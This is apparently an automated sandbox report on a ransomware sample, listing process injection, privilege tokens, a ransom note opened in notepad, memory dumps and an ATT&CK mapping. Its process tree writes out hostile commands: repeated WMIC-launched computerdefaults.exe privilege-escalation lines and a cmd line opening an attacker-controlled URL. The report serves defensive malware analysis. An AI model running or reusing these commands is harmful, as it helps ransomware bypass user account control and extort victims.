00390039003000360030003000320030003500000053002d0031002d00310035002d0033002d0031003000320034002d0031003800360034003100310031003700350034002d003700370036003200370033003300310037002d0033003600360036003900320035003000320037002d0032003500320033003900300038003000380031002d0033003700390032003400350038003200300036002d0033003500380032003400370032003400330037002d0034003100310034003400310039003900370037002d003100350038003200380038003400380035003700000053002d0031002d00310035002d0033002d0031003000320034002d0034003000340034003800330035003100330039002d0032003600350038003400380032003000340031002d0033003100320037003900370033003100360034002d003300320039003200380037003200330031002d0033003800360035003800380030003800360031002d0031003900330038003600380035003600340033002d003400360031003000360037003600350038002d003100300038003700300030003000340032003200000053002d0031002d00310035002d0033002d0031003000320034002d0032003900320032003200390036003200360031002d0031003600340037003400380032003700360038002d0032003000310037003000390031003100340036002d0033003800350038003600360037003000360038002d0034003100330035003600360033003600360032002d0032003900330031003900380035003800390034002d0031003600320037003800320030003900320035002d00380031003800330036003600340033003100000053002d0031002d00310035002d0033002d003300000053002d0031002d00310035002d0033002d003800000053002d0031002d00310035002d0033002d0031003000320034002d0032003400340030003300300036003300370037002d0033003300300034003600310031003000340039002d0031003400390034003300390039003000370031002d0031003100360031003900320036003200320033002d003100360033003900310032003300380034002d0031003400330037003000360035003700370033002d0031003400350036003800320030003500360030002d00320033003900300031003500380031003900360000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser	MicrosoftEdge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3832	notepad.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3028	WerFault.exe
3028	WerFault.exe
3028	WerFault.exe
3028	WerFault.exe
3028	WerFault.exe
3028	WerFault.exe
3028	WerFault.exe
3028	WerFault.exe
3028	WerFault.exe
3028	WerFault.exe
3028	WerFault.exe
3028	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3016	Explorer.EXE

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3128	MicrosoftEdgeCP.exe
3128	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3028	WerFault.exe
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1564	WMIC.exe
Token: SeSecurityPrivilege	1564	WMIC.exe
Token: SeTakeOwnershipPrivilege	1564	WMIC.exe
Token: SeLoadDriverPrivilege	1564	WMIC.exe
Token: SeSystemProfilePrivilege	1564	WMIC.exe
Token: SeSystemtimePrivilege	1564	WMIC.exe
Token: SeProfSingleProcessPrivilege	1564	WMIC.exe
Token: SeIncBasePriorityPrivilege	1564	WMIC.exe
Token: SeCreatePagefilePrivilege	1564	WMIC.exe
Token: SeBackupPrivilege	1564	WMIC.exe
Token: SeRestorePrivilege	1564	WMIC.exe
Token: SeShutdownPrivilege	1564	WMIC.exe
Token: SeDebugPrivilege	1564	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1564	WMIC.exe
Token: SeRemoteShutdownPrivilege	1564	WMIC.exe
Token: SeUndockPrivilege	1564	WMIC.exe
Token: SeManageVolumePrivilege	1564	WMIC.exe
Token: 33	1564	WMIC.exe
Token: 34	1564	WMIC.exe
Token: 35	1564	WMIC.exe
Token: 36	1564	WMIC.exe
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeShutdownPrivilege	3016	Explorer.EXE
Token: SeCreatePagefilePrivilege	3016	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	3760	WMIC.exe
Token: SeSecurityPrivilege	3760	WMIC.exe
Token: SeTakeOwnershipPrivilege	3760	WMIC.exe
Token: SeLoadDriverPrivilege	3760	WMIC.exe
Token: SeSystemProfilePrivilege	3760	WMIC.exe
Token: SeSystemtimePrivilege	3760	WMIC.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
4196	firefox.exe
4196	firefox.exe
4196	firefox.exe
4196	firefox.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4196	firefox.exe
4196	firefox.exe
4196	firefox.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
3016	Explorer.EXE
2204	MicrosoftEdge.exe
3128	MicrosoftEdgeCP.exe
3128	MicrosoftEdgeCP.exe
4196	firefox.exe
4196	firefox.exe
4196	firefox.exe
4196	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2400 wrote to memory of 3832	2400	sihost.exe	70
PID 2400 wrote to memory of 3832	2400	sihost.exe	70
PID 2400 wrote to memory of 3636	2400	sihost.exe	71
PID 2400 wrote to memory of 3636	2400	sihost.exe	71
PID 2400 wrote to memory of 1352	2400	sihost.exe	77
PID 2400 wrote to memory of 1352	2400	sihost.exe	77
PID 2400 wrote to memory of 1348	2400	sihost.exe	72
PID 2400 wrote to memory of 1348	2400	sihost.exe	72
PID 2448 wrote to memory of 3668	2448	svchost.exe	78
PID 2448 wrote to memory of 3668	2448	svchost.exe	78
PID 2448 wrote to memory of 3868	2448	svchost.exe	79
PID 2448 wrote to memory of 3868	2448	svchost.exe	79
PID 1348 wrote to memory of 1564	1348	cmd.exe	82
PID 1348 wrote to memory of 1564	1348	cmd.exe	82
PID 3016 wrote to memory of 1096	3016	Explorer.EXE	83
PID 3016 wrote to memory of 1096	3016	Explorer.EXE	83
PID 3016 wrote to memory of 608	3016	Explorer.EXE	86
PID 3016 wrote to memory of 608	3016	Explorer.EXE	86
PID 3868 wrote to memory of 3760	3868	cmd.exe	87
PID 3868 wrote to memory of 3760	3868	cmd.exe	87
PID 1352 wrote to memory of 3756	1352	cmd.exe	88
PID 1352 wrote to memory of 3756	1352	cmd.exe	88
PID 2728 wrote to memory of 924	2728	taskhostw.exe	89
PID 2728 wrote to memory of 924	2728	taskhostw.exe	89
PID 2728 wrote to memory of 2440	2728	taskhostw.exe	93
PID 2728 wrote to memory of 2440	2728	taskhostw.exe	93
PID 3668 wrote to memory of 1356	3668	cmd.exe	91
PID 3668 wrote to memory of 1356	3668	cmd.exe	91
PID 608 wrote to memory of 2284	608	cmd.exe	94
PID 608 wrote to memory of 2284	608	cmd.exe	94
PID 3472 wrote to memory of 2916	3472	RuntimeBroker.exe	96
PID 3472 wrote to memory of 2916	3472	RuntimeBroker.exe	96
PID 3472 wrote to memory of 3124	3472	RuntimeBroker.exe	97
PID 3472 wrote to memory of 3124	3472	RuntimeBroker.exe	97
PID 1096 wrote to memory of 836	1096	cmd.exe	100
PID 1096 wrote to memory of 836	1096	cmd.exe	100
PID 2440 wrote to memory of 3864	2440	cmd.exe	101
PID 2440 wrote to memory of 3864	2440	cmd.exe	101
PID 2376 wrote to memory of 2336	2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	106
PID 2376 wrote to memory of 2336	2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	106
PID 924 wrote to memory of 1804	924	cmd.exe	102
PID 924 wrote to memory of 1804	924	cmd.exe	102
PID 2376 wrote to memory of 3488	2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	103
PID 2376 wrote to memory of 3488	2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	103
PID 3124 wrote to memory of 2700	3124	cmd.exe	107
PID 3124 wrote to memory of 2700	3124	cmd.exe	107
PID 2916 wrote to memory of 3692	2916	cmd.exe	108
PID 2916 wrote to memory of 3692	2916	cmd.exe	108
PID 3488 wrote to memory of 3736	3488	cmd.exe	109
PID 3488 wrote to memory of 3736	3488	cmd.exe	109
PID 2336 wrote to memory of 1364	2336	cmd.exe	110
PID 2336 wrote to memory of 1364	2336	cmd.exe	110
PID 716 wrote to memory of 4104	716	cmd.exe	120
PID 716 wrote to memory of 4104	716	cmd.exe	120
PID 3136 wrote to memory of 4116	3136	cmd.exe	119
PID 3136 wrote to memory of 4116	3136	cmd.exe	119
PID 1328 wrote to memory of 4144	1328	cmd.exe	121
PID 1328 wrote to memory of 4144	1328	cmd.exe	121
PID 3152 wrote to memory of 4176	3152	cmd.exe	122
PID 3152 wrote to memory of 4176	3152	cmd.exe	122
PID 4204 wrote to memory of 4308	4204	cmd.exe	125
PID 4204 wrote to memory of 4308	4204	cmd.exe	125
PID 4372 wrote to memory of 4500	4372	cmd.exe	136
PID 4372 wrote to memory of 4500	4372	cmd.exe	136

c:\windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2400
- \??\c:\windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3832
- \??\c:\windows\system32\cmd.exe
  cmd /c "start http://f0340250eef46e10aaeltalkfzj.jobsbig.cam/eltalkfzj^&1^&48225306^&74^&315^&2215063"
  2⤵
  - Checks computer location settings
  PID:3636
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1348
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1564
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1352
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3756

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
- Suspicious use of WriteProcessMemory
PID:2448
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3668
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1356
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3868
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3760

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2728
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:924
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1804
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2440
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3864

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3016
- C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
  "C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2376
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3488
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:3736
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2336
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:1364
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1096
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:836
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:608
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2284
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:984
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    - Checks processor information in registry
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:4196
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4196.0.1447813663\79342242" -parentBuildID 20200403170909 -prefsHandle 1524 -prefMapHandle 1412 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4196 "\\.\pipe\gecko-crash-server-pipe.4196" 1616 gpu
      4⤵
      PID:1420
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4196.3.1523611766\1058069496" -childID 1 -isForBrowser -prefsHandle 2248 -prefMapHandle 2024 -prefsLen 122 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4196 "\\.\pipe\gecko-crash-server-pipe.4196" 2240 tab
      4⤵
      PID:1936
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4196.13.283784695\2068107025" -childID 2 -isForBrowser -prefsHandle 3312 -prefMapHandle 3416 -prefsLen 6979 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4196 "\\.\pipe\gecko-crash-server-pipe.4196" 3428 tab
      4⤵
      PID:3720
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4196.20.955819267\1981538372" -childID 3 -isForBrowser -prefsHandle 4240 -prefMapHandle 4224 -prefsLen 7750 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4196 "\\.\pipe\gecko-crash-server-pipe.4196" 4228 tab
      4⤵
      PID:3128

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3472
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3692
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3124
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2700

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3672
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3672 -s 812
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3028

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3136
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4116

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1328
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4144

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:716
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4104

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3152
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4176

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4204
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4308

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4352
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4492

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4372
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4500

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4432
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4720

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4460
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4708

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4480
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4800

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4604
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4768

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4668
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4868

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2204

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4040

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3128

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:1164

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2272

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3176

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2376-129-0x000001E524CA0000-0x000001E524CA1000-memory.dmp

Filesize
4KB

Download
memory/2376-123-0x000001E524C20000-0x000001E524C21000-memory.dmp

Filesize
4KB

Download
memory/2376-118-0x000001E522BA0000-0x000001E522BA6000-memory.dmp

Filesize
24KB

Download
memory/2376-119-0x000001E522CF0000-0x000001E522CF1000-memory.dmp

Filesize
4KB

Download
memory/2376-122-0x000001E522D20000-0x000001E522D21000-memory.dmp

Filesize
4KB

Download
memory/2376-120-0x000001E522D00000-0x000001E522D01000-memory.dmp

Filesize
4KB

Download
memory/2376-121-0x000001E522D10000-0x000001E522D11000-memory.dmp

Filesize
4KB

Download
memory/2376-127-0x000001E524C80000-0x000001E524C81000-memory.dmp

Filesize
4KB

Download
memory/2376-128-0x000001E524C90000-0x000001E524C91000-memory.dmp

Filesize
4KB

Download
memory/2376-156-0x000001E525290000-0x000001E525291000-memory.dmp

Filesize
4KB

Download
memory/2376-124-0x000001E524C30000-0x000001E524C31000-memory.dmp

Filesize
4KB

Download
memory/2376-125-0x000001E524C40000-0x000001E524C41000-memory.dmp

Filesize
4KB

Download
memory/2376-126-0x000001E524C70000-0x000001E524C71000-memory.dmp

Filesize
4KB

Download
memory/2400-130-0x00000275F3420000-0x00000275F3424000-memory.dmp

Filesize
16KB

Download